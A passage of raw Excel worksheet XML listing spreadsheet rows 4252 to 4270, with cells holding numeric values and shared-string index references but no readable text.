        <v>31589</v>
      </c>
      <c r="P4252" s="12">
        <v>3.16</v>
      </c>
      <c r="Q4252" s="12">
        <v>3.16</v>
      </c>
      <c r="R4252" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4252" s="12" t="s">
        <v>27346</v>
      </c>
      <c r="T4252" s="12" t="s">
        <v>26533</v>
      </c>
      <c r="U4252" s="12" t="s">
        <v>27347</v>
      </c>
      <c r="V4252" s="12" t="s">
        <v>25878</v>
      </c>
      <c r="W4252" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4252" s="12">
        <v>24</v>
      </c>
      <c r="Y4252" s="12" t="s">
        <v>27348</v>
      </c>
    </row>
    <row r="4253" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4253" s="12">
        <v>83151</v>
      </c>
      <c r="B4253" s="12" t="s">
        <v>31368</v>
      </c>
      <c r="D4253" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4253" s="12" t="s">
        <v>31548</v>
      </c>
      <c r="F4253" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4253" s="12" t="s">
        <v>27349</v>
      </c>
      <c r="H4253" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4253" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4253" s="12" t="s">
        <v>26990</v>
      </c>
      <c r="K4253" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4253" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4253" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4253" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4253" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4253" s="12">
        <v>3.16</v>
      </c>
      <c r="Q4253" s="12">
        <v>3.16</v>
      </c>
      <c r="R4253" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4253" s="12" t="s">
        <v>27350</v>
      </c>
      <c r="T4253" s="12" t="s">
        <v>27323</v>
      </c>
      <c r="U4253" s="12" t="s">
        <v>27351</v>
      </c>
      <c r="V4253" s="12" t="s">
        <v>3260</v>
      </c>
      <c r="W4253" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4253" s="12">
        <v>13</v>
      </c>
      <c r="Y4253" s="12" t="s">
        <v>27352</v>
      </c>
    </row>
    <row r="4254" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4254" s="12">
        <v>83231</v>
      </c>
      <c r="B4254" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4254" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4254" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4254" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4254" s="12" t="s">
        <v>27353</v>
      </c>
      <c r="H4254" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4254" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4254" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4254" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4254" s="12" t="s">
        <v>11596</v>
      </c>
      <c r="M4254" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N4254" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O4254" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4254" s="12" t="s">
        <v>27354</v>
      </c>
      <c r="Q4254" s="12">
        <v>3.17</v>
      </c>
      <c r="R4254" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4254" s="12" t="s">
        <v>27355</v>
      </c>
      <c r="T4254" s="12" t="s">
        <v>27356</v>
      </c>
      <c r="U4254" s="12" t="s">
        <v>27357</v>
      </c>
      <c r="V4254" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4254" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4254" s="12">
        <v>8</v>
      </c>
      <c r="Y4254" s="12" t="s">
        <v>27358</v>
      </c>
    </row>
    <row r="4255" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4255" s="12">
        <v>84031</v>
      </c>
      <c r="B4255" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4255" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4255" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4255" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4255" s="12" t="s">
        <v>27359</v>
      </c>
      <c r="H4255" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4255" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4255" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4255" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4255" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4255" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4255" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4255" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4255" s="12" t="s">
        <v>27120</v>
      </c>
      <c r="Q4255" s="12">
        <v>3.13</v>
      </c>
      <c r="R4255" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4255" s="12" t="s">
        <v>27360</v>
      </c>
      <c r="T4255" s="12" t="s">
        <v>27361</v>
      </c>
      <c r="U4255" s="12" t="s">
        <v>27362</v>
      </c>
      <c r="V4255" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4255" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4255" s="12">
        <v>6</v>
      </c>
      <c r="Y4255" s="12" t="s">
        <v>27363</v>
      </c>
    </row>
    <row r="4256" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4256" s="12">
        <v>84111</v>
      </c>
      <c r="B4256" s="12" t="s">
        <v>31345</v>
      </c>
      <c r="D4256" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4256" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4256" s="12" t="s">
        <v>31306</v>
      </c>
      <c r="G4256" s="12" t="s">
        <v>27364</v>
      </c>
      <c r="H4256" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4256" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4256" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4256" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4256" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4256" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4256" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4256" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4256" s="12" t="s">
        <v>27365</v>
      </c>
      <c r="Q4256" s="12">
        <v>3.13</v>
      </c>
      <c r="R4256" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4256" s="12" t="s">
        <v>27366</v>
      </c>
      <c r="T4256" s="12" t="s">
        <v>27367</v>
      </c>
      <c r="U4256" s="12" t="s">
        <v>27368</v>
      </c>
      <c r="V4256" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4256" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4256" s="12">
        <v>14</v>
      </c>
      <c r="Y4256" s="12" t="s">
        <v>27369</v>
      </c>
    </row>
    <row r="4257" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4257" s="12">
        <v>84381</v>
      </c>
      <c r="B4257" s="12" t="s">
        <v>31345</v>
      </c>
      <c r="D4257" s="12" t="s">
        <v>31366</v>
      </c>
      <c r="E4257" s="12" t="s">
        <v>31545</v>
      </c>
      <c r="F4257" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4257" s="12" t="s">
        <v>27370</v>
      </c>
      <c r="H4257" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4257" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4257" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K4257" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4257" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4257" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4257" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4257" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4257" s="12" t="s">
        <v>27371</v>
      </c>
      <c r="Q4257" s="12">
        <v>3.17</v>
      </c>
      <c r="R4257" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4257" s="12" t="s">
        <v>27372</v>
      </c>
      <c r="T4257" s="12" t="s">
        <v>27373</v>
      </c>
      <c r="U4257" s="12" t="s">
        <v>27374</v>
      </c>
      <c r="V4257" s="12" t="s">
        <v>21160</v>
      </c>
      <c r="W4257" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4257" s="12">
        <v>28</v>
      </c>
      <c r="Y4257" s="12" t="s">
        <v>27375</v>
      </c>
    </row>
    <row r="4258" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4258" s="12">
        <v>84561</v>
      </c>
      <c r="B4258" s="12" t="s">
        <v>30769</v>
      </c>
      <c r="D4258" s="12" t="s">
        <v>30770</v>
      </c>
      <c r="E4258" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4258" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4258" s="12" t="s">
        <v>27376</v>
      </c>
      <c r="H4258" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4258" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4258" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4258" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4258" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4258" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4258" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4258" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4258" s="12" t="s">
        <v>27377</v>
      </c>
      <c r="Q4258" s="12">
        <v>3.16</v>
      </c>
      <c r="R4258" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4258" s="12" t="s">
        <v>27378</v>
      </c>
      <c r="T4258" s="12" t="s">
        <v>27379</v>
      </c>
      <c r="U4258" s="12" t="s">
        <v>27380</v>
      </c>
      <c r="V4258" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4258" s="12">
        <v>84221</v>
      </c>
      <c r="X4258" s="12">
        <v>34</v>
      </c>
      <c r="Y4258" s="12" t="s">
        <v>27381</v>
      </c>
    </row>
    <row r="4259" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4259" s="12">
        <v>85051</v>
      </c>
      <c r="B4259" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4259" s="12" t="s">
        <v>30499</v>
      </c>
      <c r="E4259" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F4259" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4259" s="12" t="s">
        <v>27382</v>
      </c>
      <c r="H4259" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4259" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4259" s="12" t="s">
        <v>3110</v>
      </c>
      <c r="K4259" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4259" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4259" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4259" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4259" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4259" s="12" t="s">
        <v>27383</v>
      </c>
      <c r="Q4259" s="12">
        <v>3.16</v>
      </c>
      <c r="R4259" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4259" s="12" t="s">
        <v>27384</v>
      </c>
      <c r="T4259" s="12" t="s">
        <v>27195</v>
      </c>
      <c r="U4259" s="12" t="s">
        <v>27385</v>
      </c>
      <c r="V4259" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4259" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4259" s="12">
        <v>19</v>
      </c>
      <c r="Y4259" s="12" t="s">
        <v>27386</v>
      </c>
    </row>
    <row r="4260" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4260" s="12">
        <v>85131</v>
      </c>
      <c r="B4260" s="12" t="s">
        <v>31174</v>
      </c>
      <c r="C4260" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D4260" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4260" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4260" s="12" t="s">
        <v>31150</v>
      </c>
      <c r="G4260" s="12" t="s">
        <v>27387</v>
      </c>
      <c r="H4260" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4260" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4260" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4260" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4260" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4260" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4260" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4260" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4260" s="12" t="s">
        <v>27388</v>
      </c>
      <c r="Q4260" s="12">
        <v>3.17</v>
      </c>
      <c r="R4260" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4260" s="12" t="s">
        <v>27389</v>
      </c>
      <c r="T4260" s="12" t="s">
        <v>27390</v>
      </c>
      <c r="U4260" s="12" t="s">
        <v>27391</v>
      </c>
      <c r="V4260" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4260" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4260" s="12">
        <v>7</v>
      </c>
      <c r="Y4260" s="12" t="s">
        <v>27392</v>
      </c>
    </row>
    <row r="4261" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4261" s="12">
        <v>85691</v>
      </c>
      <c r="B4261" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4261" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4261" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4261" s="12" t="s">
        <v>27393</v>
      </c>
      <c r="H4261" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4261" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4261" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4261" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4261" s="12" t="s">
        <v>26139</v>
      </c>
      <c r="M4261" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4261" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4261" s="12" t="s">
        <v>31592</v>
      </c>
      <c r="P4261" s="12">
        <v>3.17</v>
      </c>
      <c r="Q4261" s="12">
        <v>3.17</v>
      </c>
      <c r="R4261" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4261" s="12" t="s">
        <v>27394</v>
      </c>
      <c r="T4261" s="12" t="s">
        <v>15772</v>
      </c>
      <c r="U4261" s="12" t="s">
        <v>27395</v>
      </c>
      <c r="V4261" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4261" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4261" s="12">
        <v>9</v>
      </c>
      <c r="Y4261" s="12" t="s">
        <v>27396</v>
      </c>
    </row>
    <row r="4262" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4262" s="12">
        <v>85931</v>
      </c>
      <c r="B4262" s="12" t="s">
        <v>31175</v>
      </c>
      <c r="C4262" s="12" t="s">
        <v>31176</v>
      </c>
      <c r="D4262" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4262" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4262" s="12" t="s">
        <v>27397</v>
      </c>
      <c r="H4262" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4262" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4262" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4262" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4262" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4262" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4262" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4262" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4262" s="12">
        <v>3.17</v>
      </c>
      <c r="Q4262" s="12">
        <v>3.17</v>
      </c>
      <c r="R4262" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4262" s="12" t="s">
        <v>27398</v>
      </c>
      <c r="T4262" s="12" t="s">
        <v>27399</v>
      </c>
      <c r="U4262" s="12" t="s">
        <v>27400</v>
      </c>
      <c r="V4262" s="12" t="s">
        <v>16927</v>
      </c>
      <c r="W4262" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4262" s="12">
        <v>52</v>
      </c>
      <c r="Y4262" s="12" t="s">
        <v>27401</v>
      </c>
    </row>
    <row r="4263" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4263" s="12">
        <v>86231</v>
      </c>
      <c r="B4263" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4263" s="12" t="s">
        <v>31302</v>
      </c>
      <c r="D4263" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4263" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F4263" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G4263" s="12" t="s">
        <v>27402</v>
      </c>
      <c r="H4263" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4263" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4263" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4263" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4263" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4263" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4263" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4263" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4263" s="12" t="s">
        <v>27403</v>
      </c>
      <c r="Q4263" s="12">
        <v>3.17</v>
      </c>
      <c r="R4263" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4263" s="12" t="s">
        <v>27404</v>
      </c>
      <c r="T4263" s="12" t="s">
        <v>27195</v>
      </c>
      <c r="U4263" s="12" t="s">
        <v>27405</v>
      </c>
      <c r="V4263" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4263" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4263" s="12">
        <v>84</v>
      </c>
      <c r="Y4263" s="12" t="s">
        <v>27406</v>
      </c>
    </row>
    <row r="4264" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4264" s="12">
        <v>86331</v>
      </c>
      <c r="B4264" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D4264" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4264" s="12" t="s">
        <v>31429</v>
      </c>
      <c r="F4264" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4264" s="12" t="s">
        <v>27407</v>
      </c>
      <c r="H4264" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4264" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4264" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4264" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4264" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4264" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4264" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4264" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4264" s="12" t="s">
        <v>27408</v>
      </c>
      <c r="Q4264" s="12">
        <v>3.15</v>
      </c>
      <c r="R4264" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4264" s="12" t="s">
        <v>27409</v>
      </c>
      <c r="T4264" s="12" t="s">
        <v>27410</v>
      </c>
      <c r="U4264" s="12" t="s">
        <v>27411</v>
      </c>
      <c r="V4264" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4264" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4264" s="12">
        <v>10</v>
      </c>
      <c r="Y4264" s="12" t="s">
        <v>27412</v>
      </c>
    </row>
    <row r="4265" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4265" s="12">
        <v>86531</v>
      </c>
      <c r="B4265" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4265" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D4265" s="12" t="s">
        <v>31162</v>
      </c>
      <c r="E4265" s="12" t="s">
        <v>31537</v>
      </c>
      <c r="F4265" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4265" s="12" t="s">
        <v>27413</v>
      </c>
      <c r="H4265" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4265" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J4265" s="12" t="s">
        <v>6599</v>
      </c>
      <c r="K4265" s="12" t="s">
        <v>19481</v>
      </c>
      <c r="L4265" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4265" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4265" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4265" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4265" s="12" t="s">
        <v>27414</v>
      </c>
      <c r="Q4265" s="12">
        <v>3.17</v>
      </c>
      <c r="R4265" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4265" s="12" t="s">
        <v>27415</v>
      </c>
      <c r="T4265" s="12" t="s">
        <v>25705</v>
      </c>
      <c r="U4265" s="12" t="s">
        <v>27416</v>
      </c>
      <c r="V4265" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W4265" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4265" s="12">
        <v>6</v>
      </c>
      <c r="Y4265" s="12" t="s">
        <v>27417</v>
      </c>
    </row>
    <row r="4266" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4266" s="12">
        <v>87191</v>
      </c>
      <c r="B4266" s="12" t="s">
        <v>30452</v>
      </c>
      <c r="D4266" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F4266" s="12" t="s">
        <v>30457</v>
      </c>
      <c r="G4266" s="12" t="s">
        <v>27418</v>
      </c>
      <c r="H4266" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4266" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4266" s="12" t="s">
        <v>6179</v>
      </c>
      <c r="K4266" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4266" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4266" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4266" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4266" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4266" s="12" t="s">
        <v>27419</v>
      </c>
      <c r="Q4266" s="12">
        <v>3.17</v>
      </c>
      <c r="R4266" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4266" s="12" t="s">
        <v>27420</v>
      </c>
      <c r="T4266" s="12" t="s">
        <v>25705</v>
      </c>
      <c r="U4266" s="12" t="s">
        <v>27421</v>
      </c>
      <c r="V4266" s="12" t="s">
        <v>8165</v>
      </c>
      <c r="W4266" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4266" s="12">
        <v>51</v>
      </c>
      <c r="Y4266" s="12" t="s">
        <v>27422</v>
      </c>
    </row>
    <row r="4267" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4267" s="12">
        <v>87721</v>
      </c>
      <c r="B4267" s="12" t="s">
        <v>30769</v>
      </c>
      <c r="D4267" s="12" t="s">
        <v>30770</v>
      </c>
      <c r="E4267" s="12" t="s">
        <v>31428</v>
      </c>
      <c r="F4267" s="12" t="s">
        <v>30773</v>
      </c>
      <c r="G4267" s="12" t="s">
        <v>27423</v>
      </c>
      <c r="H4267" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4267" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J4267" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K4267" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4267" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4267" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4267" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4267" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4267" s="12" t="s">
        <v>27414</v>
      </c>
      <c r="Q4267" s="12">
        <v>3.17</v>
      </c>
      <c r="R4267" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4267" s="12" t="s">
        <v>27424</v>
      </c>
      <c r="T4267" s="12" t="s">
        <v>27263</v>
      </c>
      <c r="U4267" s="12" t="s">
        <v>27425</v>
      </c>
      <c r="V4267" s="12" t="s">
        <v>6579</v>
      </c>
      <c r="W4267" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4267" s="12">
        <v>8</v>
      </c>
      <c r="Y4267" s="12" t="s">
        <v>27426</v>
      </c>
    </row>
    <row r="4268" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4268" s="12">
        <v>87801</v>
      </c>
      <c r="B4268" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C4268" s="12" t="s">
        <v>28361</v>
      </c>
      <c r="D4268" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E4268" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F4268" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="G4268" s="12" t="s">
        <v>27427</v>
      </c>
      <c r="H4268" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4268" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4268" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K4268" s="12" t="s">
        <v>37</v>
      </c>
      <c r="L4268" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4268" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4268" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4268" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4268" s="12">
        <v>3.17</v>
      </c>
      <c r="Q4268" s="12">
        <v>3.17</v>
      </c>
      <c r="R4268" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4268" s="12" t="s">
        <v>27428</v>
      </c>
      <c r="T4268" s="12" t="s">
        <v>26700</v>
      </c>
      <c r="U4268" s="12" t="s">
        <v>27429</v>
      </c>
      <c r="V4268" s="12" t="s">
        <v>3902</v>
      </c>
      <c r="W4268" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4268" s="12">
        <v>4</v>
      </c>
      <c r="Y4268" s="12" t="s">
        <v>27430</v>
      </c>
    </row>
    <row r="4269" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4269" s="12">
        <v>87831</v>
      </c>
      <c r="B4269" s="12" t="s">
        <v>30790</v>
      </c>
      <c r="D4269" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4269" s="12" t="s">
        <v>31437</v>
      </c>
      <c r="F4269" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G4269" s="12" t="s">
        <v>27431</v>
      </c>
      <c r="H4269" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4269" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J4269" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K4269" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4269" s="12" t="s">
        <v>11536</v>
      </c>
      <c r="M4269" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N4269" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O4269" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4269" s="12" t="s">
        <v>27432</v>
      </c>
      <c r="Q4269" s="12">
        <v>3.18</v>
      </c>
      <c r="R4269" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S4269" s="12" t="s">
        <v>27433</v>
      </c>
      <c r="T4269" s="12" t="s">
        <v>27434</v>
      </c>
      <c r="U4269" s="12" t="s">
        <v>27435</v>
      </c>
      <c r="V4269" s="12" t="s">
        <v>2476</v>
      </c>
      <c r="W4269" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X4269" s="12">
        <v>3</v>
      </c>
      <c r="Y4269" s="12" t="s">
        <v>27436</v>
      </c>
    </row>
    <row r="4270" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A4270" s="12">
        <v>87971</v>
      </c>
      <c r="B4270" s="12" t="s">
        <v>30365</v>
      </c>
      <c r="C4270" s="12" t="s">
        <v>30366</v>
      </c>
      <c r="D4270" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E4270" s="12" t="s">
        <v>31490</v>
      </c>
      <c r="F4270" s="12" t="s">
        <v>30364</v>
      </c>
      <c r="G4270" s="12" t="s">
        <v>27437</v>
      </c>
      <c r="H4270" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I4270" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J4270" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K4270" s="12" t="s">
        <v>26984</v>
      </c>
      <c r="L4270" s="12" t="s">
        <v>11546</v>
      </c>
      <c r="M4270" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N4270" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O4270" s="12" t="s">
        <v>31589</v>
      </c>
      <c r="P4270" s="12" t="s">
        <v>27365</v>
      </c>
      <c r="Q4270" s="12">
